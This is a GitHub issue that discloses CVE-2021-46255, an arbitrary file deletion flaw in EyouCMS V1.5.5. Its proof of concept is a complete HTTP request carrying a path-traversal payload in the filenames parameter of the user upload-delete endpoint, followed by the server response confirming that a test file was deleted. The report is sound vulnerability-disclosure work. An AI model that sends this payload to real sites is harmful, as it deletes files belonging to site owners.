CVE-2021-46255: There is an arbitrary file deletion vulnerability in your code · Issue #21 · eyoucms/eyoucms

#Author: yukidddd

#Submit date: 07/01/2022
#Target: https://www.eyoucms.com/
#Version: V1.5.5-UTF8-SP3_1 (https://www.eyoucms.com/index.php?m=home&c=Index&a=downdemo)
#Description:Due to insufficient filtering of the parameter filename, it can cause any file to be deleted
#PoC:

1. Now,content of the root folder of the website is like this,and we created a new test.txt as a test

2. Then we log in as a normal user and send the following payload

###Request: GET /index.php?m=user&c=Uploadify&a=del_local&filenames=/uploads/…//test.txt HTTP/1.1 Host: localhost sec-ch-ua: " Not A;Brand";v="99", “Chromium";v="96” Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 sec-ch-ua-platform: “Windows” Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/?m=user&c=Users&a=index Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: cookie_token=b524f68dde14d175a5a29af375704b7361e80aeacf0acedac77a3b397a4a56e9; admin=admin; pass=21232f297a57a5a743894a0e4a801fc3; UserName=test; PassWord=098f6bcd4621d373cade4e832627b4f6; home_lang=cn; admin_lang=cn; PHPSESSID=t0kq7ujoc9351sj4vl251ra20s; referurl=http%3A%2F%2Flocalhost%2F; users_id=4 Connection: close

###Response: HTTP/1.1 200 OK Server: nginx/1.15.11 Date: Fri, 07 Jan 2022 05:28:07 GMT Content-Type: application/json; charset=utf-8 Connection: close X-Powered-By: PHP/7.3.4 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Cache-control: private Set-Cookie: site_info=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: users_id=4; path=/ Content-Length: 4

true

3. And now,the test.txt file has been deleted